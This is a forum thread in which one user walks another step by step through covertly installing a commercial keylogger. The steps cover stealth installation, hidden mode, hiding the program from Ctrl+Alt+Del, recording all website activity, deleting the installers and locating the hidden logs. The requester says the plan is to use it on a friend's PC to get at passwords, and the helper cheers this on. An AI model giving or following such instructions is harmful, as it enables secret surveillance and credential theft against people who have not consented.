Accessing passwords from internet usage

Status
Not open for further replies.
and you had 'Launch when Windows start' box ticked before you restarted?

I'm going to re download it again and test it again.

Hi, you know what, I can't remember whether that box was ticked - I think perhaps it wasn't now you say that - i thought if that was ticked it would launch automatically and appear on the screen everytime the machine started up. I'll try it again.

also, I meant to ask - does it matter which one I download - there are 4 for usa, one for europe etc on the download page.

right, wish me luck - I'm gonna try again!

regards the boxes that were ticked when I selected stealth installation - the otehr two were ticked so I'll leave them as they are and also make sure I have the other boxes ticked before I restart.

I'll report back in a sec...sorry again tobe a pain!:eek:

I'll write some more clear instruction of how to set it up. It doesn't matter which one you download from on Majorgeeks.

1. Download from http://www.majorgeeks.com/KGB_Key_Logger_d4590.html
2. Install and don't create a desktop shortcut.
3. Launch the Logger.
4. Click 'Launch in Hidden Mode' and run the new installer.
5. During this Installer, tick the Stealth installation box and remove the tick in the create a desktop icon box.
6. Run the new logger.
7. Re-tick Launch in hidden mode.
8. Make sure 'Hide the program from ctrl + alt + del' and 'Record all website activity' boxs are ticked.
9. Click the 'Play' button then the 'hidden mode' button.
10. Delete the installers from desktop.

The logs are saved at :
C:\Documents and Settings\All Users\Application Data\KSP\

and the installation is installed at:
C:\Program Files\KGB Keylogger

To view these you have to have view hidden folder and files enabled. If you do not know how to do this just ask.

I've dunnit!!! yey!!!!:D Thank you very very very much for your time and patience - it was that tick box about launch on windows start up I was missing.

Thank you again - I'll try it this weekend on my friend's PC.

Well done. Glad to see it work!
Your welcome and remember i'm here for anymore problems/questions :)

Have fun.

James.

thanks again James - really appreciate it. I know where to come now if I need any hints or tips on anything! :D

Status
Not open for further replies.
Back
Top Bottom